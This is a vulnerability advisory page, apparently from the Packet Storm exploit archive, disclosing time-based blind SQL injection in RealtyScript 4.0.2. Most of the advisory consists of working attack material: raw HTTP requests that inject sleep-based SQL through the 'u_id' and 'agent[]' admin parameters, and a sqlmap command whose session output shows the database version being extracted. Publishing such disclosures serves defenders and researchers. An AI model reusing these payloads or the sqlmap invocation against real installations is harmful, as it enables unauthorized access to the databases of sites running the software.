exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RealtyScript 4.0.2 SQL Injection

RealtyScript 4.0.2 SQL Injection
Posted Oct 20, 2015
Authored by LiquidWorm | Site zeroscience.mk

RealtyScript version 4.0.2 suffers from multiple time-based remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 1f3e785774f832fdf7b1357440cab9156e77b9370708776c8323b95ad53d9a77

RealtyScript 4.0.2 SQL Injection

Change Mirror Download

RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities


Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2

Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.

Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]'
is not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

Tested on: Apache/2.4.6 (CentOS)
PHP/5.4.16
MariaDB-5.5.41


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5270
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php


01.10.2015

--


(1)

GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)-- & HTTP/1.1


(2)

POST /admin/mailer.php HTTP/1.1
Host: TARGET
Content-Length: 62
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/admin/mailer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5;

agent[]=102 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=Send




====================================== .sqlmap session output =======================================

$ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version"
_
___ ___| |_____ ___ ___ {1.0-dev-04c1d43}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.

[*] starting at 14:36:36

[14:36:36] [INFO] parsing HTTP request from 'request1.txt'
[14:36:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM)
---
[14:36:36] [INFO] testing MySQL
[14:36:36] [INFO] confirming MySQL
[14:36:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0
[14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version'
[14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:37:03] [INFO] adjusting time delay to 2 seconds due to good response times
5.5.41-MariaDB
SELECT @@version: '5.5.41-MariaDB'
[14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET'

[*] shutting down at 14:38:50

======================================= sqlmap session output. ======================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close